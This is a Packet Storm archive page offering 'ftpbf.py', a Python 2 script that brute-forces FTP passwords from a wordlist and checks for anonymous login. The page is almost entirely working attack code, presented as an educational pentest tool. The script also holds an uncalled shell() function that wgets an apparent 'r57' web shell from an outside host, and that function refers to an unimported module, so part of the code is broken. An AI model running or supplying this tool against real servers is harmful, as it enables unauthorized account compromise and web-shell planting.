what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

FTP Brute Forcing Tool 0.1

FTP Brute Forcing Tool 0.1
Posted Mar 16, 2011
Authored by baltazar

This is a simple python script to brute force ftpd.

tags | cracker, python
SHA-256 | 75f9adacc2779c88694791ef3852491c0f039afccdbe8c1600dbf7fde13417ba

FTP Brute Forcing Tool 0.1

Change Mirror Download
#!/usr/bin/python
# This was written for educational purpose and pentest only. Use it at your own risk.
# Author will be not responsible for any damage!
# !!! Special greetz for my friend sinner_01 !!!
# Toolname : ftpbf.py
# Coder : baltazar a.k.a b4ltazar < b4ltazar@gmail.com>
# Version : 0.1
# About :
# Greetz for rsauron and low1z, great python coders
# greetz for d3hydr8, qk, marezzi, StRoNiX, t0r3x, fx0, TraXdata, v0da and all members of ex darkc0de.com, ljuska.org and rev3rse.org
#
#
# Example of use : ./ftpbf.py -t ftp.server.com -u baltazar -w words.txt
# After scanning check ftpbf.txt for more info (in next version)

import sys, os, time
from ftplib import FTP

if sys.platform == 'linux' or sys.platform == 'linux2':
clearing = 'clear'
else:
clearing = 'cls'
os.system(clearing)

R = "\033[31m";
G = "\033[32m";



def logo():
print G+"\n|---------------------------------------------------------------|"
print "| |"
print "| b4ltazar[@]gmail[dot]com |"
print "| 02/2011 ftpbf.py v.0.1 |"
print "| FTP Brute Forcing Tool |"
print "| |"
print "|---------------------------------------------------------------|\n"
print "\n[-] %s\n" % time.strftime("%X")

def help():
logo()
print R+"-t, --target ip/hostname <> Our target"
print "-u, --user user <> Our user"
print "-w, --wordlist wordlist <> wordlist path"
print "-h, --help help <> print this help"
print "ex: ./ftpbf -t ftp.server.com -u baltazar -w passwords.txt"
sys.exit(1)

for arg in sys.argv:
if arg.lower() == '-t' or arg.lower() == '--target':
hostname = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-u' or arg.lower() == '--user':
user = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-w' or arg.lower() == '--wordlist':
wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-h' or arg.lower() == '--help':
help()
elif len(sys.argv) <= 1:
help()

logo()



def bf(p):
sys.stdout.write("\r[!]Checking : %s " % (p))
sys.stdout.flush()
try:
ftp = FTP(hostname)
ftp.login(user, p)
ftp.retrlines('list')
ftp.quit()
print R+"\n[!] w00t,w00t!!! We did it ! "
print "[+] Target : ",hostname, ""
print "[+] User : ",user, ""
print "[+] Password : ",p, ""
sys.exit(1)
except Exception, e:
pass
except KeyboardInterrupt:
print "\n[-] Exiting ...\n"
sys.exit(1)
def anon():
try:
print "\n[!] Checking for anonymous login\n"
ftp = FTP(hostname)
ftp.login()
ftp.retrlines('LIST')
print R+"\n[!] w00t,w00t!!! Anonymous login successfuly !\n"

ftp.quit()
except Exception, e:
print G+"\n[-] Anonymous login unsuccessful...\n"
pass
def shell():
os.system("wget http://hmvhotels.com/unaesthetically/r57.txt")
if commands.getoutput("ls") != "r57.txt":
print "Sorry cant upload shell"
else:
print "w00t,w00t!!! Shell up"

print "[!] BruteForcing target ..."
anon()

try:
passwords = open(wordlist, "r")
pwd = passwords.readlines()
count = 0
while count < len(pwd):
pwd[count] = pwd[count].strip()
count +=1
except(IOError):
print "\n[-] Check your wordlist path\n"
sys.exit(1)

print G+"\n[+] Loaded:",len(pwd),"passwords"
print "[+] Target:",hostname
print "[+] User:",user
print "[+] Guessing...\n"
for p in pwd:
bf(p.replace("\n",""))
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    16 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close